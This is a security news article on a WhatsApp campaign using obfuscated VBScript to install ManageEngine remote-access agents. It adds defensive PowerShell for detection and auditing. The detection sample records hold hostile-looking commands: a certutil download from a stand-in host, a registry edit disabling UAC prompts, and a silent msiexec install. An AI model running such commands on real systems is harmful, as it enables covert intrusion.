PROBABLYPWNED
Malware · June 23, 2026 · 4 min read

WhatsApp Campaign Spreads RMM Backdoors via VBScript Files

Kaspersky uncovers a multi-country malware campaign using WhatsApp to distribute VBScript files that install ManageEngine remote access tools. Malaysia accounts for 80% of victims.

James Rivera

A malware campaign distributing remote access tools through WhatsApp has infected victims across 11 countries, with Kaspersky researchers tracing infections from Malaysia to Brazil to Vietnam. The attackers use heavily obfuscated VBScript files disguised as financial documents to install legitimate remote monitoring software that provides persistent backdoor access.

The campaign targets individual consumers rather than specific organizations, spreading through compromised WhatsApp accounts that send malicious files to contact lists. Malaysia accounts for approximately 80% of observed infections. This social engineering approach—abusing trust in known contacts—follows patterns documented in our social engineering guide.

Attack Chain

Victims receive VBScript attachments via WhatsApp direct messages from contacts whose accounts were previously compromised. The files use deceptive names suggesting invoices, receipts, or business documents—the kind of content users might expect to receive and open without suspicion.

When executed through Windows Script Host, the infection proceeds in three stages:

Stage 1: The initial script creates hidden working directories under C:\Users\Public\Documents\ and downloads additional payloads. The malware employs multiple download mechanisms including curl, bitsadmin, certutil, and PowerShell to evade detection and ensure successful retrieval.

Stage 2: Secondary VBScripts execute in sequence. The first modifies Windows UAC registry settings to eliminate consent prompts for future actions. The second downloads and extracts a ZIP archive containing the deployment packages.

Stage 3: A legitimate ManageEngine Endpoint Central RMM agent installs silently via msiexec.exe. The preconfigured deployment package contains everything needed for remote system access—installer, configuration files, certificates, and silent installation scripts.

This technique of weaponizing legitimate remote administration tools mirrors other campaigns we've covered where attackers abuse trusted software to maintain access while evading security tools that might flag custom malware.
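The three stages above share one parent: every download utility, registry edit and silent msiexec run is a child of the Windows Script Host process that executed the VBScript. That parent-child relationship is what a defender can alert on without knowing the obfuscated script contents. The following detection logic is an added example written for this article, not code from Kaspersky or from the campaign; it runs over constructed process-creation records shaped like Sysmon Event ID 1 fields (UtcTime, ParentImage, Image, CommandLine), and the sample records, hostnames and paths in it are invented for illustration.

```powershell
# Added example: flag LOLBin downloaders, UAC policy edits and silent MSI installs
# whose parent process is wscript.exe or cscript.exe. Field names follow Sysmon
# Event ID 1; the records below are constructed, not real telemetry.

$DownloaderImages = @('curl.exe', 'bitsadmin.exe', 'certutil.exe', 'powershell.exe', 'pwsh.exe')
$ScriptHosts      = @('wscript.exe', 'cscript.exe')

function Test-ScriptHostParent {
    param([string]$ParentImage)
    $name = [System.IO.Path]::GetFileName($ParentImage).ToLowerInvariant()
    return ($ScriptHosts -contains $name)
}

function Get-SuspiciousProcessEvents {
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        # Only children of Windows Script Host are of interest here
        if (-not (Test-ScriptHostParent $e.ParentImage)) { continue }

        $image  = [System.IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        $cmd    = [string]$e.CommandLine
        $reason = $null

        if ($DownloaderImages -contains $image) {
            # Stage 1: one of the fallback download mechanisms the article lists
            $reason = "Downloader '$image' spawned by Windows Script Host"
        }
        elseif ($image -eq 'reg.exe' -and $cmd -match 'Policies\\System') {
            # Stage 2: edits under the UAC policy key (ConsentPromptBehaviorAdmin, EnableLUA)
            $reason = 'UAC policy registry key modified from a script host'
        }
        elseif ($image -eq 'msiexec.exe' -and $cmd -match '/(qn|quiet)') {
            # Stage 3: silent MSI installation launched from a script host
            $reason = 'Silent msiexec install launched by Windows Script Host'
        }

        if ($reason) {
            [PSCustomObject]@{
                UtcTime     = $e.UtcTime
                Image       = $image
                Reason      = $reason
                CommandLine = $cmd
            }
        }
    }
}

# Constructed sample records (hostnames use the reserved .invalid TLD)
$SampleEvents = @(
    [PSCustomObject]@{ UtcTime = '2026-06-20 09:12:01'; ParentImage = 'C:\Windows\System32\wscript.exe'
                       Image = 'C:\Windows\System32\certutil.exe'
                       CommandLine = 'certutil.exe -urlcache -f http://payload.example.invalid/a.zip C:\Users\Public\Documents\x\a.zip' },
    [PSCustomObject]@{ UtcTime = '2026-06-20 09:12:07'; ParentImage = 'C:\Windows\System32\wscript.exe'
                       Image = 'C:\Windows\System32\reg.exe'
                       CommandLine = 'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' },
    [PSCustomObject]@{ UtcTime = '2026-06-20 09:12:30'; ParentImage = 'C:\Windows\System32\wscript.exe'
                       Image = 'C:\Windows\System32\msiexec.exe'
                       CommandLine = 'msiexec.exe /i C:\Users\Public\Documents\x\agent.msi /qn' },
    [PSCustomObject]@{ UtcTime = '2026-06-20 10:00:00'; ParentImage = 'C:\Windows\explorer.exe'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -File C:\Scripts\backup.ps1' }   # benign: not a script-host child
)

Get-SuspiciousProcessEvents -Events $SampleEvents | Format-Table -AutoSize
```

Run against the constructed records, the first three events are flagged (one per stage) and the explorer-spawned PowerShell is not. To use it on real data, map your EDR or Sysmon export onto the same four fields; the image and regex lists are the only tuning points, and `msiexec` without a silent flag or `reg.exe` touching other keys is deliberately left unflagged to keep the rule tied to the behaviour the article describes.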

Heavy Obfuscation

The VBScript samples employ aggressive obfuscation to complicate analysis. Techniques include string concatenation that reassembles commands character by character, randomized variable names, and substantial junk code mixed with functional operations. Researchers noted that some variants "employ even heavier obfuscation than other samples."

Files are configured with hidden and system attributes to reduce visibility in file explorers. The scripts also implement download fallback logic, attempting multiple methods to retrieve payloads until one succeeds.

Infrastructure and Attribution

Kaspersky identified several malicious domains hosting payloads:

  • temu.baskwms[.]top
  • invoice.msopsa[.]top
  • qse.shoppes[.]help

Command-and-control infrastructure includes IP addresses 202.61.160[.]201, 202.61.160[.]202, and 38.55.151[.]63. The last of these was previously associated with ValleyRAT and Gh0st RAT campaigns attributed to Chinese-speaking threat actors.

Simplified Chinese comments embedded in multiple VBScript variants suggest a Chinese-speaking developer. However, researchers assessed the attribution with "low confidence" since infrastructure overlaps remain insufficient for definitive conclusions. The techniques mirror those used by cryptocurrency theft operations that also rely on script-based loaders and RMM tool abuse.

Geographic Distribution

Infections span multiple continents:

  • Malaysia: ~80%
  • Brazil, India, Mexico
  • Singapore, UK, Spain
  • Taiwan, Australia, Russia, Vietnam

The heavy Malaysia concentration could reflect initial seeding through compromised accounts in that region, language-specific targeting, or simply the geographic location where researchers first detected the campaign.

Why RMM Tools?

Attackers increasingly favor legitimate remote monitoring and management software over custom backdoors for several reasons. RMM tools come with signed binaries that antivirus products trust. They're designed for persistent access with auto-reconnection and remote shell capabilities built in. And they blend into enterprise environments where IT teams deploy the same tools legitimately.

ManageEngine Endpoint Central specifically offers software deployment, remote support, and comprehensive system control—everything an attacker needs to maintain persistent access and expand their foothold.

Defensive Recommendations

  1. Train users to treat WhatsApp attachments with suspicion, especially unexpected VBScript or executable files
  2. Block VBS/VBE execution via Windows Script Host where business requirements allow
  3. Monitor RMM tool installations for unexpected ManageEngine Endpoint Central deployments
  4. Audit UAC registry settings for unauthorized modifications
  5. Block known malicious domains and IPs listed in the Kaspersky report

For organizations, the campaign demonstrates how consumer messaging platforms extend the corporate attack surface. Employees receiving compromised messages on personal WhatsApp accounts may forward malicious files to corporate systems, particularly in BYOD environments.

Users who believe they may have executed suspicious VBScript files should check for unexpected ManageEngine services and review whether UAC consent prompts have been disabled.
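Recommendations 2 through 4 and the triage advice above reduce to a handful of registry values, services and directories that can be checked in one pass. The script below is an added example for this article, not Kaspersky's or ManageEngine's tooling. It assumes the standard Windows locations for the UAC policy key and the Windows Script Host `Enabled` setting; because the article does not name the agent's service or product names, ManageEngine artefacts are matched on the vendor string, so review the output rather than treating every hit as malicious on a machine where the product is deployed legitimately.

```powershell
# Added example: local audit of the settings and artefacts the article describes.
# Run in an elevated PowerShell session. Read-only except for Disable-WindowsScriptHost.

$UacKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$WshKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings',
    'HKCU:\SOFTWARE\Microsoft\Windows Script Host\Settings'
)
$UninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
)

function Get-UacStatus {
    # Windows defaults: EnableLUA=1, ConsentPromptBehaviorAdmin=5, PromptOnSecureDesktop=1.
    # EnableLUA=0 or ConsentPromptBehaviorAdmin=0 means elevation happens without a prompt.
    $p = Get-ItemProperty -Path $UacKey -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        ConsentPromptsDisabled     = (($p.EnableLUA -eq 0) -or ($p.ConsentPromptBehaviorAdmin -eq 0))
    }
}

function Get-WshStatus {
    # Enabled=0 under either key blocks wscript.exe/cscript.exe (recommendation 2)
    foreach ($k in $WshKeys) {
        $v = (Get-ItemProperty -Path $k -Name Enabled -ErrorAction SilentlyContinue).Enabled
        [PSCustomObject]@{ Key = $k; Enabled = $v; Blocked = ("$v" -eq '0') }
    }
}

function Get-ManageEngineFootprint {
    # Assumption: service and product display names contain the vendor string.
    $services = Get-Service | Where-Object {
        $_.DisplayName -like '*ManageEngine*' -or $_.Name -like '*ManageEngine*'
    }
    $products = Get-ItemProperty -Path $UninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -like '*ManageEngine*' } |
        Select-Object DisplayName, InstallDate, InstallLocation

    # Stage 1 staging area from the article: hidden+system directories under Public\Documents
    $staging = Get-ChildItem -Path 'C:\Users\Public\Documents' -Force -Directory -ErrorAction SilentlyContinue |
        Where-Object {
            (($_.Attributes -band [IO.FileAttributes]::Hidden) -ne 0) -and
            (($_.Attributes -band [IO.FileAttributes]::System) -ne 0)
        }

    [PSCustomObject]@{
        Services         = $services | Select-Object Name, DisplayName, Status
        Products         = $products
        HiddenSystemDirs = $staging | Select-Object FullName, CreationTime
    }
}

function Disable-WindowsScriptHost {
    # Recommendation 2, machine-wide. Only apply where no logon or admin scripts rely on WSH.
    $key = $WshKeys[0]
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name Enabled -Value 0 -Type DWord
}

'--- UAC policy values ---';           Get-UacStatus | Format-List
'--- Windows Script Host ---';         Get-WshStatus | Format-Table -AutoSize
'--- ManageEngine / staging dirs ---'; Get-ManageEngineFootprint | Format-List
```

A machine that has been through the chain described above typically shows `ConsentPromptsDisabled` as `True`, an unexpected ManageEngine entry under Services or Products, and a hidden, system-attributed directory in `C:\Users\Public\Documents` whose creation time lines up with the WhatsApp message. Call `Disable-WindowsScriptHost` separately, after confirming nothing in the environment depends on VBS execution.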
